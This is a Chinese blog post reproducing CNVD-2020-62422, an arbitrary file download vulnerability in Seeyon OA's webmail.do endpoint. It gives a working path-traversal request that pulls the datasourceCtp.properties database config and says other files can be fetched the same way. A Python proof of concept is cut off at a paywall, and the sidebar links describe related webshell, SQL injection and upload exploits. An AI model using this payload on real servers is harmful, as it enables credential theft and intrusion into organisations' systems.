致远OA webmail.do任意文件下载 CNVD-2020-62422

最新推荐文章于 2024-07-25 13:44:24 发布
最新推荐文章于 2024-07-25 13:44:24 发布
阅读量5.2k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46257936/article/details/113150699
版权
本文详细介绍了致远OA webmail.do组件存在的任意文件下载漏洞,包括漏洞描述、影响范围、复现步骤以及POC演示。攻击者可以利用该漏洞下载敏感文件,例如配置文件datasourceCtp.properties,影响涉及A6-V5、A8-V5、G6等多个版本。
摘要由CSDN通过智能技术生成

致远OA webmail.do任意文件下载 CNVD-2020-62422

在这里插入图片描述

漏洞描述

致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息

漏洞影响

致远OA A6-V5

致远OA A8-V5

致远OA G6

漏洞复现

访问 url http://xxx.xxx.xxx.xxx/seeyon/webmail.do?method=doDownloadAtt&filename=PeiQi.txt&filePath=…/conf/datasourceCtp.properties

存在漏洞的OA 系统将会下载 datasourceCtp.properties 配置文件

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HTywpQPB-1611588619254)(image/zhiyuan-11.png)]

更改参数 filePath 可下载其他文件

漏洞利用POC

import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
    print
最低0.47元/天 解锁文章
PeiQi_WiKi
关注
专栏目录
HW漏洞集合(二)-thinkphp-yaml版
HWHXY的博客
03-31 1593
HW漏洞集合(二)-yml版 link:ThinkPHP漏洞总结 11. ThinkPHP 5.0.23远程代码执行 name: poc-yaml-thinkphp5023-method-rce rules: - method: POST path: /index.php?s=captcha headers: Content-Type: application/x-www-form-urlencoded body: | _method=__construc
致远OA漏洞分析、利用与防护合集
不忘初心,护天下安全!
06-21 3816
致远OA办公自动化软件, 用于OA办公自动化软件的开发销售,由用友致远互联旗下协同管理软件系统,在国内很多央企、大型公司都有广泛应用。致远互联基于“组织行为管理”理论,自主研发了V5协同管理平台,开发了面向中小企业组织的A6+产品,面向中大型企业和集团性企业组织的A8+产品,以及面向政府组织及事业单位的G6产品 。致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息app="致远互联-OA"验证POC 在存在漏洞的OA 系统将会下载 datasourceCtp.properties
致远OA任意文件下载漏洞(CNVD-2020-62422
1stPeak's Blog
06-15 7148
漏洞描述 致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息 payload 致远OA webmail.do文件读取漏洞, 由于 /seeyon/webmail.do 页面 filePath 参数过滤不严,导致可以读取系统敏感文件。 通过修改filePath参数来下载服务器文件 /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.proper
[漏洞合集]致远获取后台权限及权限绕过漏洞大合集
最新发布
LiangYueSec的博客
07-25 2103
[漏洞合集]致远获取后台权限及权限绕过漏洞大合集
【漏洞复现】致远OA webmail.do 任意文件下载 (CNVD-2020-62422)
凝聚力安全团队
06-20 589
致远OA webmail.do 处存在任意文件读取,攻击者可以从其中获取网站路径和数据库账号密码等敏感信息进一步攻击。
致远OA SQL&任意文件下载漏洞(含批量检测POC)
今天是几号的博客
03-21 3385
通过信息收集,查出web根目录D:/UFseeyon/OA/tomcat/webapps/yyoa,通过 into outfile 写入文件,这里因为 jsp木马存在特殊符号,使用 hex编码 上传允许文件上传的jsp文件。致远OA webmail.do文件读取漏洞,由于/seeyon/webmail.do 页面 filePath 参数过滤不严,导致可以读取系统敏感文件。致远OA A6 test.jsp 存在sql注入漏洞,并可以通过注入写入webshell文件控制服务器。app=“致远互联-OA
OA-Seeyou:笔记
05-15
OA-Seeyou note 致远OA数据库配置文件 致远OA数据库配置文件:/opt/Seeyon/A8/base/conf/datasourceCtp.properties ctpDataSource.minCount=50 mysql.backup.path= db.hibernateDialect=org.hibernate.dialect.SQLServerDialect ctpDataSource.username=sa workflow.dialect=SQLServer ctpDataSource.driverClassName=com.microsoft.sqlserver.jdbc.SQLServerDriver ctpDataSource.password=/1.0/UWJ0dHgxc2U= ctpDataSource.url=jdbc:sqlserver://127
致远OA文件上传漏洞(含批量检测POC)
热门推荐
今天是几号的博客
03-21 1万+
由于致远OA旧版本某些接口存在未授权访问,以及部分函数存在过滤不足,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3。致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1)致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3。致远OA G6、G6N (V8.1、V8.1SP1)。致远OA V6.0、V6.1SP1、V6.1SP2。致远OA V7.1、V7.1SP1。
致远OA-ajax.do未授权文件上传漏洞1
08-08
近日,致远OA ajaxAction 文件上传漏洞利用代码披露,由于致远OA旧版本中某些接口存在未授权访问,以及部分函数过滤不足,攻击者通过构造恶意请求,可在无
致远OA任意文件下载1
08-08
然而,在致远OAwebmail.do文件中存在一个任意文件下载漏洞,攻击者可以通过修改filePath参数来下载服务器上的敏感文件。 漏洞详情 该漏洞是由于webmail.do文件的filePath参数过滤不严所致。攻击者可以通过构造...
tutemastev#PeiQi-WIKI-POC#银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437
07-25
银澎云计算 好视通视频会议系统 任意文件下载漏洞描述银澎云计算 好视通视频会议系统 存在任意文件下载,攻击者可以通过漏洞获取敏感信息漏洞影响银澎云计算 好视通视
【官方】CNVD成员单位申请材料模板
06-12
CNVD成员单位申请材料模板。 官方发布,内含手续过程。
致远OA-A8系统的0day远程命令执行的实战-附件资源
03-05
致远OA-A8系统的0day远程命令执行的实战-附件资源
Dermail-用Vue.js编写的Webmail客户端,这是用node.js编写的邮件系统。-Vue.js开发
05-27
dermail-webmail Dermail系统的前端界面。 用Vue.js编写。 从Dermail-API请求资源。 git.fm,github,Webmail支持dermail-webmail Dermail系统的前端界面。 用Vue.js编写。 从Dermail-API请求资源。 git.fm,github...
致远OA A6 员工敏感信息泄露
qq_42660246的博客
04-26 8331
致远OA A6 员工敏感信息泄露 1.漏洞描述 seeyon OA A6版本存在敏感信息泄露漏洞,攻击者可构造payload,获取敏感信息。 2.复现过程 fofa:app=“致远A6” payload:/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 浏览器访问https://IP:PORT/yyoa/DownExcelBeanServlet?contenttype=use
致远OA检测工具-seeyon_exp
siu~
09-21 1270
致远OA综合利用工具
致远(用友)OA或M1 漏洞复现
ccz4854的博客
08-09 5153
致远OA通过发送特殊请求获取session,在通过文件上传接口上传特殊构造的恶意压缩包,并通过解压为webshell控制服务器。
神兵利器 | HW常见OA利用工具(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
04-13 790
常见OA漏洞利用检测工具Tools-1Tools-2Tools-3后台回复tools,获取工具。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值